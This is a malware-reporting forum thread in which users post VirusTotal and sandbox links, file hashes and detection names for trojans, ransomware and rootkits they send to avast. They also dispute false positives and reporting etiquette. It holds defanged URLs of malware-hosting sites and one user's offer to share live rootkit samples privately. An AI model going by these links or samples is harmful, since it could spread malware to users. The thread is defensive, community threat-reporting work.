See Comodo analysis here: htxp://camas.comodo.com/cgi-bin/submit?file=84c90377421a63cfe767c17d7079877b7dab0f4c63d6b0d9f87ddb48e7a50360
Another variant of mentioned TR/FlyStudio.AI.1129 trojan-dropper is: File Name: shengguangtupian.ex-
MD5: 0cb2f654fd22256efa7ae84f2b8c9625
974890 AntiVir 2009/06/12 11:17:27 (CEST)
Meaning that bmp.exe is a 2009 variant trojan dropper that was resurrected and re-launched 2 days ago, so old wine in new sacks really,
reported the above to virus AT avast dot com for verification,
polonus
-
Not detected by avast: htxps://www.virustotal.com/file/528e5fe23f9208f9f3726fdcd794517d3df3eaaef4b055ef88017eb9bc9fadc2/analysis/
see: htxp://zulu.zscaler.com/submission/show/bad6c4bbfdb76b8cc8abeaf333ae3014-1337263557
A block should be considered because there are 18 reports of various MSIL/Solimba application or Gen:Variant.Barys.2069 active from that domain &
bad host for 1 yr and 7 months on 896 appearances in spam e-mail or spam post urls.
polonus
-
Hi true indian,
Could well be that bmp.exe is found up by avast flagged as PUP risktool. For safe variants of that media player tool see: htxp://www.backgroundtask.eu/Systeemtaken/taakinfo/30932/BMP.exe/
htxp://www.runscanner.net/lib/bmp.exe.html and
where this Chinese active malcode is being flagged as TR/FlyStudio.AI.1129, see: htxp://zulu.zscaler.com/submission/show/002b26f390d7be7416d1574ab05c8298-1337262299 avast does not detect it yet (possibly as PUP when run): hxtp://vscan.urlvoid.com/analysis/0cb2f654fd22256efa7ae84f2b8c9625/Ym1wLWV4ZQ==/
See Comodo analysis here: htxp://camas.comodo.com/cgi-bin/submit?file=84c90377421a63cfe767c17d7079877b7dab0f4c63d6b0d9f87ddb48e7a50360
Another variant of mentioned TR/FlyStudio.AI.1129 trojan-dropper is: File Name: shengguangtupian.ex-
MD5: 0cb2f654fd22256efa7ae84f2b8c9625
974890 AntiVir 2009/06/12 11:17:27 (CEST)
Meaning that bmp.exe is a 2009 variant trojan dropper that was resurrected and re-launched 2 days ago, so old wine in new sacks really,
reported the above to virus AT avast dot com for verification,
polonus
thanks polonus u are quick person and a good teacher! ;)
-
Ransom Kuluoz
https://www.virustotal.com/file/361e0b4554ca3748f3400138dded289532f7aa53fd1c2b2fd2e921df531cdf21/analysis/1337270928/
remains undetected....
http://zulu.zscaler.com/submission/show/fa1f2b17cb31d1b0bb10da8ead1058e1-1337270982
reported to avast! ;)
-
Rootkit Sinowal/Mebroot
https://www.virustotal.com/file/c46c9904032aa9cb4939ba36c270a39a3fbbda0335f9d7f2e801009fbdfe7820/analysis/
https://www.virustotal.com/file/91889b00b570964e1689cfa188992ad9bd6d2897adf9ca57f1002d467de913ea/analysis/
https://www.virustotal.com/file/8a295ccfb0cb7c41d2588662b81dc9f7c2b993da40019303ab89eff31e15d372/analysis/
Reported to avast! ;)
-
Ransom.Win32/LockScreen.AJU
https://www.virustotal.com/file/1673ec3cc708e5092276b2104bc1836df8a370f8077eda1a5ae4126212a7c835/analysis/
Reported to avast!
-
Windows Safeguard Upgrade Rogue
https://www.virustotal.com/file/92aad05c19d5e16f0acd5239310cc769eabb1c42de6bc46a4a2ae02b023a8ddb/analysis/
Reported to avast! 8)
-
Rootkit Sinowal/Mebroot
As a side note,i can confirm these are real rootkit samples...found them on many on my clients machines during remote assistance online...they are fresh ones spreading here in india....anubody who wants samples please PM me ;D
-
Ransomware - Polska Policja (Polish Police)
https://www.virustotal.com/file/d2164cdbc9c78db0115f382a139ccd758f8a25ebfc5ab3e0034e7aef0fe0b6b4/analysis/
Reported to avast!
(http://i.imgur.com/tCbAF.jpg)
-
Ransom Kuluoz
https://www.virustotal.com/file/361e0b4554ca3748f3400138dded289532f7aa53fd1c2b2fd2e921df531cdf21/analysis/1337270928/
remains undetected....
http://zulu.zscaler.com/submission/show/fa1f2b17cb31d1b0bb10da8ead1058e1-1337270982
reported to avast! ;)
First seen by VirusTotal
2010-06-25 09:46:39 UTC ( 1 år, 10 måneder ago ) yea.....must be malware ;)
Sigcheck
publisher................: MBTY
product..................: RansomHide
internal name............: ransomhide
file version.............: 0.06.0024
original name............: ransomhide.exe
comments.................: For http://forum.simplix.ks.ua
-
Rootkit Sinowal/Mebroot
https://www.virustotal.com/file/c46c9904032aa9cb4939ba36c270a39a3fbbda0335f9d7f2e801009fbdfe7820/analysis/
https://www.virustotal.com/file/91889b00b570964e1689cfa188992ad9bd6d2897adf9ca57f1002d467de913ea/analysis/
https://www.virustotal.com/file/8a295ccfb0cb7c41d2588662b81dc9f7c2b993da40019303ab89eff31e15d372/analysis/
Reported to avast! ;)
First seen by VirusTotal
2012-04-08 13:33:07 UTC ( 1 måned, 1 uke ago ) and only detected by SOPHOS ......suspicious ?
why not upload to SOPHOS and see if they give it a FP ;) https://secure.sophos.com/support/samples/
-
There is detection for Polska Policja: https://www.virustotal.com/file/7bbd11c0e9902e6bed46bb4ea2832be45155591f4d85356d5f961b03489a21e1/analysis/
pol
-
Rogue Super scan 4
https://www.virustotal.com/file/dc01f0835207ad7264284e20b0c02048f8705c813c2c8d7071ed2f653d0209aa/analysis/
Should be flagged as PUP, if flagged at all.
See: hXtp://www.mcafee.com/us/downloads/free-tools/superscan.aspx
-
Hi !Donovan,
You are right as one of the sacn results give specifically "non-malicious",
polonus
-
Ransom Kuluoz
https://www.virustotal.com/file/361e0b4554ca3748f3400138dded289532f7aa53fd1c2b2fd2e921df531cdf21/analysis/1337270928/
remains undetected....
http://zulu.zscaler.com/submission/show/fa1f2b17cb31d1b0bb10da8ead1058e1-1337270982
reported to avast! ;)
First seen by VirusTotal
2010-06-25 09:46:39 UTC ( 1 år, 10 måneder ago ) yea.....must be malware ;)
Sigcheck
publisher................: MBTY
product..................: RansomHide
internal name............: ransomhide
file version.............: 0.06.0024
original name............: ransomhide.exe
comments.................: For http://forum.simplix.ks.ua
NORMAN lab
ransomhide.exe : Clean!
-
There is detection for Polska Policja: https://www.virustotal.com/file/7bbd11c0e9902e6bed46bb4ea2832be45155591f4d85356d5f961b03489a21e1/analysis/
pol
Pol,i guess thats a same one with a different file MD5. ::) The sample i have is not detected yet.And as far i as the Mebroot samples go i will try looking into sophos FP...
Thanks! ;D
-
Here we go again... ;D
Same baddie but different MD5
https://www.virustotal.com/file/f85ed4acbf504d67407f385021c2c1bd5c14ab71dd85809aef5b586038039c60/analysis/
Reported to avast!
-
TR/Crypt.XPACK.Gen
https://www.virustotal.com/file/98562164ccf323a656495fa63549f16e9a589e5339e693b109efb37cb6ae08c0/analysis/
Trojan-Ransom.Win32.Foreign.oud
https://www.virustotal.com/file/89c35017051d428b20fcfbb00a653b6ae6df9973d8efaa4ceec269f0e0383027/analysis/
Reported to avast!
-
https://www.virustotal.com/file/34bba08af67f71658c4e117970bae6e37f199279adb925aa5bc44a3ee2abd961/analysis/1337332685/
fake av send to avast.
-
https://www.virustotal.com/file/34bba08af67f71658c4e117970bae6e37f199279adb925aa5bc44a3ee2abd961/analysis/1337332685/
fake av send to avast.
jotti
http://virusscan.jotti.org/en/scanresult/a50b864f890356e660242e9ce4826cbf3605f09d
Metascan
http://metascan-online.com/results/u9nbucv90cm0nbeprkmkevi1ln3eei1a
detected by Malwarebytes - Rogue.FakeAV
detected by superantispyware - Trojan.Agent/Gen-FakeProtector
-
Hi Pondus,
Thank you, Pondus, keep these reports coming to add to and to check avast detection. You prove that one has to be selective as what to report to virus AT avast dot com, so that the detections fit their categories.
This thread proves that the common user should have additional non-residential protection next to his avast residential av-solution WITH the shields enabled, like MBAM and SAS on demand and keep these fully updated and perform a quick scan with them now and again.. Personally I combine that with some third-party in-browser protection like DrWeb's online scanner and BitDefender TrafficLight and QuickScan to further close the vulnerability gap/vulnerability window. But scanning feedback is very important. If DrWeb's online pre-scanner misses detections I report back (that is why Dim@rik came to join our forums) , and also when Zscaler Zulu does not have detection I will give feedback of what has been found with other scanners.
On a side note. I tried Quttera WIS (beta) at htxp://www.quttera.com/ against all sorts of verified malcious URLs and all the time the scan comes up as clean. Is this scanner a scam for their services or just worthless?
polonus
-
See: htxp://zulu.zscaler.com/submission/show/7168cb24855e4ad93246acc1fd01ae81-1337355518
and accompanying VT results: htxps://www.virustotal.com/file/e56df40e2ba498dec082ef61412c04c578636c618f07cbec6bd1ecf060360ebf/analysis/
trojan banker detection missed,
reported to virus AT avast dot com,
polonus
-
W32/Ransom.AJL
https://www.virustotal.com/file/49cbc766c4b4ebec1e1c5d4cac5283062b1f0eecde4e9eaeab4bad8c11d138f1/analysis/
Trojan-Downloader.Win32.Banload.bvkc
https://www.virustotal.com/file/19d7d3969e18a42291db48db5b97491f41c188aae53c96277aac6c64cf91b933/analysis/
Reported to avast! ;)
-
Trojan.Winlock.5600
https://www.virustotal.com/file/49cbc766c4b4ebec1e1c5d4cac5283062b1f0eecde4e9eaeab4bad8c11d138f1/analysis/
Trojan-Downloader.Win32.LilyJade.a
http://virusscan.jotti.org/en/scanresult/28eafbf1e9e1f01a517e4c9786563018338a7fe8
Reported to avast!
-
TR/Crypt.XPACK.Gen
https://www.virustotal.com/file/49cbc766c4b4ebec1e1c5d4cac5283062b1f0eecde4e9eaeab4bad8c11d138f1/analysis/
Worm/Rebhip.A.4947
https://www.virustotal.com/file/88153a883b7633b1fc0208fe8cffdb3cd9e87f1f4aac5e1d74949524a91155d4/analysis/
TR/Crypt.ASPM.Gen
https://www.virustotal.com/file/3984e91ec5b0ee5b3a0e1efb9b9fc4312e004bfc2b27a88eabc938bf058b0cda/analysis/
Win32/IRCBot.worm.variant
https://www.virustotal.com/file/ffc086b6577dac19c99f53569dec5a86e0a6f5709d9588c56ca75f499d883a62/analysis/
Malware.JS.Generic (JS)
https://www.virustotal.com/file/b8a0a684fe02172343272b5e3fa348cd1ed2f25a71194063f7ccf4d62c3d745e/analysis/
Reported to avast!
https://www.virustotal.com/file/ffc086b6577dac19c99f53569dec5a86e0a6f5709d9588c56ca75f499d883a62/analysis/
-
Exploit.Java.Blacole.K
https://www.virustotal.com/file/8699be5447dd8ba5e530dac02310ac34fd6134d955dbf666804ec804bae3a170/analysis/1337404989/
zulu analyser:
http://zulu.zscaler.com/submission/show/087f8e3493fbf9e4e300a6d02750bc98-1337405033
reported to avast!
-
Undetected malware (Trojan?) https://www.virustotal.com/file/4d75f50ec70dbcc69ad1dd43a57c6cac30bfb8b6f36ffc3478b14b3931b206d2/analysis/1337450149/ (https://www.virustotal.com/file/4d75f50ec70dbcc69ad1dd43a57c6cac30bfb8b6f36ffc3478b14b3931b206d2/analysis/1337450149/)
Have sent to avast lab
-
Hi Mr Wrong,
This a Smidfraud adware detection,
polonus
-
Virus.MSExcel.Laroux.ja
https://www.virustotal.com/file/2b06021a97d6212aa995cdf4b778a26343272654e5da8ecea15beaf02d1a890e/analysis/
Trojan.Win32.StealthProxy
https://www.virustotal.com/file/717b9352fb16efb5f863f30d1fe7b72af97e7b5a6e68fe2e3de4a32842d8705a/analysis/
Gen:Variant.Strictor.552
https://www.virustotal.com/file/1295dfac3c682f2d12bcf2e8de07bcdca4dd5fd0ed5d04251330922163257525/analysis/
Trojan.Generic.KD.623610
https://www.virustotal.com/file/bc38899ced186b840a903af7d4d413bb2b471d74286d9eda8de8d567364d7012/analysis/
Reported to avast! ;)
-
Undetected malware
https://www.virustotal.com/file/fce7548bb591412569fc091b29784d43790850fd84b248cbd9416fad0b8c3302/analysis/1337537369/ (https://www.virustotal.com/file/fce7548bb591412569fc091b29784d43790850fd84b248cbd9416fad0b8c3302/analysis/1337537369/)
https://www.virustotal.com/file/cbf2700de3655a89f459f26dbe3a4a0114c660edbf2b544ab866832b3c1d5d08/analysis/1337537503/ (https://www.virustotal.com/file/cbf2700de3655a89f459f26dbe3a4a0114c660edbf2b544ab866832b3c1d5d08/analysis/1337537503/)
https://www.virustotal.com/file/484b7de26369566d473675d08b23b17c0ea0556977c0db2d8cd8b3598d05ce9d/analysis/1337537408/ (https://www.virustotal.com/file/484b7de26369566d473675d08b23b17c0ea0556977c0db2d8cd8b3598d05ce9d/analysis/1337537408/)
Have sent to avast lab
-
Undetected malware
https://www.virustotal.com/file/fce7548bb591412569fc091b29784d43790850fd84b248cbd9416fad0b8c3302/analysis/1337537369/ (https://www.virustotal.com/file/fce7548bb591412569fc091b29784d43790850fd84b248cbd9416fad0b8c3302/analysis/1337537369/)
https://www.virustotal.com/file/cbf2700de3655a89f459f26dbe3a4a0114c660edbf2b544ab866832b3c1d5d08/analysis/1337537503/ (https://www.virustotal.com/file/cbf2700de3655a89f459f26dbe3a4a0114c660edbf2b544ab866832b3c1d5d08/analysis/1337537503/)
https://www.virustotal.com/file/484b7de26369566d473675d08b23b17c0ea0556977c0db2d8cd8b3598d05ce9d/analysis/1337537408/ (https://www.virustotal.com/file/484b7de26369566d473675d08b23b17c0ea0556977c0db2d8cd8b3598d05ce9d/analysis/1337537408/)
Have sent to avast lab
first file......hmmmmm ???
First seen by VirusTotal
2007-06-19 08:44:26 UTC ( 4 year, 11 months ago )
Third file........ hmmmmm ???
First seen by VirusTotal
2010-06-28 15:45:09 UTC ( 1 year, 10 months ago )
-
Third file........ hmmmmm ???
First seen by VirusTotal
2010-06-28 15:45:09 UTC ( 1 year, 10 months ago )
Why?? when the 3rd one is a serious piece of malware its stuxnet ???
-
Trojan.Winlock.5490
https://www.virustotal.com/file/c7e6b8b89089784e62f73d99bd65b3f236613b356c7b0b3b62afb28ab9fdf529/analysis/
TR/Dropper.Gen
https://www.virustotal.com/file/28a503e05cabddab8dd6bcd39f52997124810b8840a40851558eb1f4d5b793a5/analysis/
Trojan.Win32.Jorik.Vobfus.dwml
https://www.virustotal.com/file/dcbb70d9a7aeffc0fb11cdd94fe3cfa24392bc5fb82a2690c01d2da282d7bade/analysis/
Trojan/Downloader.Banload.abdr
https://www.virustotal.com/file/3770bc7120b6ee942df276ffb11b507b3ffc9013b191f69d83324d6055b1374b/analysis/
TR/Crypt.CFI.Gen
https://www.virustotal.com/file/d22d84b72030d398dbe57e736e7f78eba784234e3780f38a8f1e283347cca730/analysis/
Trojan-Banker.Win32.Banz!IK
https://www.virustotal.com/file/4120fc50e0d4b42d5966a8c53de46cb40e16b03d76031de5c600d04c1800ffef/analysis/
TR/PSW.QQpass.bcss
https://www.virustotal.com/file/18f990e42194d52bf4f5c9be033fb1d372be10c4c5711f83292a37bd89f3e860/analysis/
Tool.InstallToolbar.25
https://www.virustotal.com/file/5c507b86b646d60f12d02a5ca6de92fd586985788cd18da38c6e1eb4ece69a1a/analysis/
Trojan-Ransom.Win32.Birele.nfs
https://www.virustotal.com/file/e483257677affbcfd25a303c8f1bf9366c021e232850c6f9f8612132d05e77c0/analysis/
TrojanDownloader:Win32/Scar.D
https://www.virustotal.com/file/3cf1ccfb6b219dcece5e10392f1ea5a8402c74c77ba3786be59627c864b3209d/analysis/
Trojan.Genome-360
https://www.virustotal.com/file/19dde6d47997f7631d27a4ce65fe1bf9521e6c33610974cd368ec57ad091d18d/analysis/
reported to avast! ;)
-
In one of the aforementioned links there is also a redirect to see htXp://minotauranalysis.com/search.aspx?q=0FDEA8A2436EDEE771C77275C574A399
Comodo blocked this. Malware: W32/Zbot.AAN!tr (Hacktool.Win32.Generic) FORTINET flags this...
htxps://www.virustotal.com/file/c6fb5249e1cd4f80aa06735aa03ec18ddc3bac63599db6af77a02af5089db4ae/analysis/
Avast probably will detect this as PUP,
polonus
-
Trojan/Banker.yjy
http://zulu.zscaler.com/submission/show/ba9c46d3a1fa389a90fdae7442e853e6-1337611666
detection missed here: https://www.virustotal.com/file/7d7793b382828ad64fe3b2619dcf4b03/analysis/
Reported to avast!
-
Undetected malwares
https://www.virustotal.com/file/ee814d798c6071977a9e51568fb83c0232d44106a96c5b85492e339b0ba50f18/analysis/1337626776/
https://www.virustotal.com/file/e68f23d459e260600e50cef34adbc354841cf492eebb56194141b3f917bbf2f9/analysis/1337627789/
-
Avast does not detect TR/Barys.2666.22, see according here: htxp://vscan.urlvoid.com/analysis/ec252a1247da4889b51f6c8dcd6a0503/MjBkZjE=/
But according to this avast detects: htxps://www.virustotal.com/file/7519c433e5fc7fa08af9b616c27ec0770732682068d9150d08358cb7ed4cd8a1/analysis/
reported to virus AT avast dot com,
polonus
-
Avast does not detect TR/Barys.2666.22, see according here: htxp://vscan.urlvoid.com/analysis/ec252a1247da4889b51f6c8dcd6a0503/MjBkZjE=/
But according to this avast detects: htxps://www.virustotal.com/file/7519c433e5fc7fa08af9b616c27ec0770732682068d9150d08358cb7ed4cd8a1/analysis/
reported to virus AT avast dot com,
polonus
hi pol, are they the same malware with different MD5?? i have seen this happening a couple of times in past
-
TR/Buzus.GR.172
https://www.virustotal.com/file/d32eec590fb75c4f3e4f0b678a493ee3e0daa59e05f337714c6f613a0e85f68d/analysis/
TR/Ransom.Birele.nfw
https://www.virustotal.com/file/a640c862a2be297f7a05010cdd7543abd424d6b6aa624541864fa12d6edd357d/analysis/
TR/Rogue.7434052
It was detected by older VPS but current VPS produces no detection...scanned at onlinescan.avast.com
HIDDENEXT/Worm.Gen
https://www.virustotal.com/file/95ced819bffda7fbfc45a508c0f9ad6b8c155f509d4345a0b9e49cadcd1e8010/analysis/
Trojan.Win32.UpToDown.AMN!A2
https://www.virustotal.com/file/f7459ea4cc4212628428366a5326014c8f8f8ecb2c200a4eefc2565c994248ef/analysis/
TR/Crypt.XPACK.Gen
https://www.virustotal.com/file/1db95c7a368187f48c5261deedd399b96c4b22331159698e28071522fe5ea478/analysis/
BDS/Bifrose.dtpg
https://www.virustotal.com/file/060a6ed22052d3ea944369e86fd2c265364177f62cda3fb0f4d2b56c9ffa95e1/analysis/
Win32.Infostealer.ga
https://www.virustotal.com/file/75ad57c086b7ee16c7e8038426f4862f52e8c8d2ec4914154083a3f5e5ba2f1b/analysis/1337678401/
Reported to avast!
-
HTML/Infected.WebPage.Gen2
https://www.virustotal.com/file/f05fb0c81f0eefe8916c951b3aa76e3abd492e2ee3bbbdff7a2615d1244a78e3/analysis/
Reported to avast!
-
You can just report them to Avast,stop posting here in order to increase your Posts,for god's sake.
-
You can just report them to Avast,stop posting here in order to increase your Posts,for god's sake.
I am just posting things that i feel to be posted...Actually i sent over 50 samples to avast today...i didnt post all here..so it's more than what u see i am reporting here :-[
-
In all honesty, posting here (not just for you) achieves nothing, especially when those posting here don't go back and edit their posts as and when they are added to the virus definitions.
Otherwise this is pointless, it achieves nothing.
-
In all honesty, posting here (not just for you) achieves nothing, especially when those posting here don't go back and edit their posts as and when they are added to the virus definitions.
Otherwise this is pointless, it achieves nothing.
Really?? I thought the virus analysts are looking at this topic...sorry :-[
So can anybody explain me why and what should actually be reported here? ???
-
Even if they did monitor the topic (which I rather doubt, they have more to do than monitor this topic) the virus analysts can do nothing with reports, they need samples.
So the reports are essentially worthless in terms of getting it added to the definitions. All that is achieved is a report in this topic when there is no follow up (modify post) when added to the database then it is just an unbalanced topic, lots of reports and no reports of addition to the database.
I can't explain why post here, as I feel it doesn't get it added to the database, that will only come on receipt of the sample and analysis.
-
true indian,
Report a few days upon a sample of the actual malware has been sent to virus AT avast dot com.
You should at least extensively check and counter-check and re-check after some time has elapsed.
For instance you report as undetected a downloader that avast has detection for as Win32:Ivelog-D PUP
The malware that is missed could have been found up when run as a riskware toolbar download aka TR/Dldr.Agent.apg.
Now avast team analysts has decided to treat this as a PUP detection.
You miss a detection with URLVoid, but the Networkshield flags it. Avast has protection for it.
You scan a so-called missed detection just before avast detection is being added. Sometimes detection cannot be made
because the malware is no longer active, closed etc., Some malware only survises for a minimal time online (generally 3 1/2 hrs).
As you do not know what the avast detection brew is made up with, do not comment the contents!
here I give you an example for which the greens (active) and reds (closed, taken down) are not showing the real-time situation results:
htxp://www.mwis.ru/ (a lot of greens are actually to be interpreted as reds),
polonus
-
Ransomware - Fake Police Alert
https://www.virustotal.com/file/3e3f980ab668ccde6aafee60ce16e3c35cd91e9b59bff20ce1615d5fb362a458/analysis/1337756549/
Submitted to avast! 8)
-
true indian,
Avast already detected a previous version: https://www.virustotal.com/file/d0a5cfec8e80622b3e194b5ee03e93d78c7ef3478bead6a039d213caaaa58523/analysis/
as Win32:Malware-gen. See: htxp://www.threatexpert.com/report.aspx?md5=c4c129fa72b3c0a6364635e33ee3d9b7
Tested your submission with avast Networkshield: URL:Mal detected with webBug get...
So my question is - did you check the url with the microsoft: Trojan:Win32/Weelsof.A against avast Networkshield?
I guess you did not, for we have detection there,
polonus
-
i got the sample from another site called malwares.pl :-[
-
true indian,
There was only an image from an image sharing site on VT, from : http://i.imgur.com
That image is not from malwares.pl !
As we can see from the image url.
The original forwarder was: htxps://www.virustotal.com/user/tommyklab/
and this one: hxtps://www.virustotal.com/user/24tachion/
As these finds for https://www.virustotal.com/file/3e3f980ab668ccde6aafee60ce16e3c35cd91e9b59bff20ce1615d5fb362a458/analysis/
are also landing on the avast desks, so detection will be added sooner or later anyway.
This time I think I have to agree with a couple of DavidR's remarks,
polonus
-
TR/Crypt.XPACK.Gen undetected by avast:
https://www.virustotal.com/file/1ac55d11a737f0fee48c8226cd37dca69f79c70fff57deecf49308871b998f75/analysis/1337779565/
Up and alive malware since 2012-05-23 04:50:02
DrWeb's online scan detects: htxp://91.202.244.89/files/cd88e infected with Trojan.Winlock.5600
reported to virus AT avast dot com
polonus
-
true indian,
You shamelessly copied that, so again you are feeding us fud. That image is not from malwares.pl !
polonus
Pol,i didnt say the image is from malwares.pl i said the sample is from malwares.pl yes the image is from VT comments but sample from malwares.pl...I thought u understood my previous post...Please ask me before blindely accusing..U misunderstood my previous statement :-\ ..Thats all i want to say.
-
Regardles of this I see no need for an image it adds nothing to help detections, samples are king, just send the samples, the rest is just wasted time.
-
As I initially misinterpreted that I have changed my initial posting accordingly.
Thanks for that explanation and the link to malwares.pl.
Well I misunderstood that because when users are going to visit the VT results, they can see that image anyway.
So like DavidR says this only takes forum disk space....as the image is availanle anyway to those that are interested.
For malwares.pl I do not know whether you provided the malware sample there, but that could be.
I think avast will add detection for it anyways within the next day or so,
polonus
-
Hi pol,
I am sorry for troubles...I will put the description from the sample source next time
-
See: http://zulu.zscaler.com/submission/show/910c0046443f9e7f5a794e7e3cada966-1337845129
Given as rogue RealRegistryCleaner here but avast missed it:
https://www.virustotal.com/file/4e09f3f888c58f152d9da643075a2f29/analysis/
I also added the Associated URL's hosting these nasties in the E-mail so they can apply analysis and block down these sites with network shield ;)
Reported to avast!
-
true indian,
This software is bordering on being suspicious/malcious. They try to prove their software comes without malware: htxp://www.softwaredownloads.org/windows/system-utilities/system-maintenance/virus-report/system-boost-elite/
When it is being flagged it is via WOT rep reports, because it comes with additional adware.
This rather should be reported then to MBAM and SAS etc. to be added to detection there,
see: http://v.virscan.org/Adware.Win32.RealRegistryCleaner.AMN!A2.html
polonus
-
I am uploading this sample to MBAM now ;D
-
See:
https://www.virustotal.com/url/0d67512199f0b583d8db822a6e349eaab317505ecc5c64e7dd769a68cf927296/analysis/
Given as rogue but detection missed:
https://www.virustotal.com/file/64fa80d1b2d0f36655f79a70bf0b06ed66acd888f64b75c1b542a03a0df27567/analysis/1337519916/
Reported to avast!
-
PowerBackupandRestoreSetup Rogue as given here:
https://www.virustotal.com/file/0eb6c55cf33e5eb5df9421668e053492/analysis/
See: http://zulu.zscaler.com/submission/show/86fe042ecff6fb676437e9aea6199675-1337848118
Detection missed!
reported to avast! with the link to sites hosting malware ;)
Uploading sampe to MBAM now ;D
-
Hi true indian,
Again a questionable one as I will explain below.
Given as non-malicious here: htxp://www.isthisfilesafe.com/md5/0EB6C55CF33E5EB5DF9421668E053492_details.aspx
Maybe a detectionwas flagged because the program is protected against reverse engineering with modern-wizard.bmp, which some scanners
will flag as a possible malware packer, but actually comes virusfree, and because of the presence of "checkver104.exe
& ioSpecial.ini / silent installer also sometimes flagged, depending on the location of it.
Scanned htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe with DrWeb's oneline check turns up these results,
at some occasions commented by me at the end of the scan lines....
Engine version: 7.0.2.4281
Total virus-finding records: 2874792
File size: 962.25 KB
File MD5: 0eb6c55cf33e5eb5df9421668e053492
htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe - archive NSIS (NSIS packer identified by Fprot packer identifier)
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/script.bin - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/_=9A=80\ioSpecial.ini - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/_=9A=80\modern-wizard.bmp - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/AutoBackup.exe - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/Backup.dll - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/FileBackup.dll - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/FolderTree.dll - Ok (validity should be checked)
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/IrisSkin2.dll - Ok (Sunisoft - safe)
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/LogViewer.exe - Ok (- Module'
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/PowerBackupandRestore.exe - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/SimpleSync.dll - Ok (location should be verified)
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/CheckVer104.exe - archive BINARYRES
>>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/CheckVer104.exe/data001 - Ok
>>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/CheckVer104.exe/data002 - archive JS-HTML
>>>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/CheckVer104.exe/data002/JSTAG_1[9][8c] - Ok
>>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/CheckVer104.exe/data002 - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/CheckVer104.exe - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/_=9A=80\iOClean.ini - Ok / silent installer, could evoke Sandbox alert
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/_=9A=80\InstallOptions.dll - Ok
>htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/_=9A=80\ExecDos.dll - Ok
>hxtp://www.applicationbox.info/PowerBackupandRestoreSetup.exe/_=9A=80\System.dll - Ok
htxp://www.applicationbox.info/PowerBackupandRestoreSetup.exe - Ok
Typical executable flagged by Emisoft, malware active since 012-05-18 08:10:59 - other instances from other domains closed.
Analysis see:
http://camas.comodo.com/cgi-bin/submit?file=9a0dd7a6e08b7476fde0dc774b72d0e8cd780883bd53a2747c078eab6ef0e4c7
a variant of Win32/Agent.SZW
Bitdefender flagged this variant of Win32/Agent.SZWas ROJ_LOWZONE.BMC (backdoor)
polonus
-
that does seem a interesting one pol...i will surely upload this sample to comodo valkyrie and check if we have anything to be detected :)
Thanks for the reports and analysis ;)
-
Hi true indian,
What I mean to say is it is interesting as all file analysis for malcode is in my view, but i.m.o. this detection does not qualify to be added to avast detection.
Emisoft´s and other´s detection is based on a false interpretation of resource engineering protection and packer evaluation. The analysis that flags it is just not good enough to give the right interpretation and the malware and backdoor status is location dependant. All seems right there. At the end of the day it might well be this is a false possitive, but leave the final verdict to avast analysts.
I for one would qualify it as a PUP detection not more, see -
htxp://anubis.iseclab.org/?action=result&task_id=185ec922d48bb01141d5963d0c58bd1d9&format=html
polonus
-
New undetected:
hxtp://urlquery.net/report.php?id=59292
but found malcious
htxp://zulu.zscaler.com/submission/show/5b124e86cc043c9d5a27951ccda33296-1337885769
hxtps://www.virustotal.com/url/e74c423163a1c2a577817added8452bf77f3907a65cff6bb726a44d594da3d6b/analysis/1337885933/
file scan gave: https://www.virustotal.com/file/ee093983a238538765e23737bdd82e8296fa895f27dbc532150accee74534c8b/analysis/1337885946/
a generic dropper dtection for a variant of MSIL/Injector.ACV
reported to virus AT avast dot com,
polonus
-
See: htxps://www.virustotal.com/url/d957ed47e8e37a165ea08052eda3d435e86c62ffadcc7fc44d4d595f45cc9c3e/analysis/
and
htxps://www.virustotal.com/file/ee51df51d91daa155caf8b167d6966e65c3587347a207380b5449e1582f200f7/analysis/
polonus
-
Rogue - Windows Safety Maintenance
https://www.virustotal.com/file/b388e80f7a73523a0861115a6d59070627e237ef0dc3c94373ab267776c7c55f/analysis/
reported to avast! ;)
EDIT: Detection added
-
FakePoliceAlert Ransomware
https://www.virustotal.com/file/d95312a777a941af73fe9c14821664423bd83893f75775ce49789a09dd1942af/analysis/1338031561/
submitted to avast! ;)
-
Undetected malwares:
https://www.virustotal.com/file/f87ded45828c004fb47bb3da57bffb1378b00c9d1953c5d09c04c4ea767f6eaa/analysis/1337968556/
https://www.virustotal.com/file/1a0d99cbf36ac600d250ee653e72a8adef3bc685c3990821b1c3dde850e521c2/analysis/1337968740/
https://www.virustotal.com/file/f92bda7141b962e1eee36d2d54dd22a03ea27c0dee6924eeba96baedea85961c/analysis/1338039267/
-
Even from the VT link I can reconstruct the original malware site for that detection. Let me guess, it was this one htxp://zulu.zscaler.com/submission/show/8fe6f00a94e39973e4c97060f369deef-1338076028
accompanying VT scan: htxps://www.virustotal.com/file/f92bda7141b962e1eee36d2d54dd22a03ea27c0dee6924eeba96baedea85961c/analysis/
somewhat earlier as your one. But as you give an identifiable hash together with a searchable file-name I could do the reconstruction via
htxp://minotauranalysis.com/search.aspx?q=4d2ea30db117d9689f3d4718bbe44ebc
and what I can do others can do. It does not need rocket science to do this reconstruction to find the non-detection URL!
So I agree with and lean more and more towards DavidR's point of view to first send a sample and VT results
to virus At avast dot com, and try to be restrictive with info here, until detection has been added,
polonus
-
found by Chabbo.... on Fake scan site
jotti
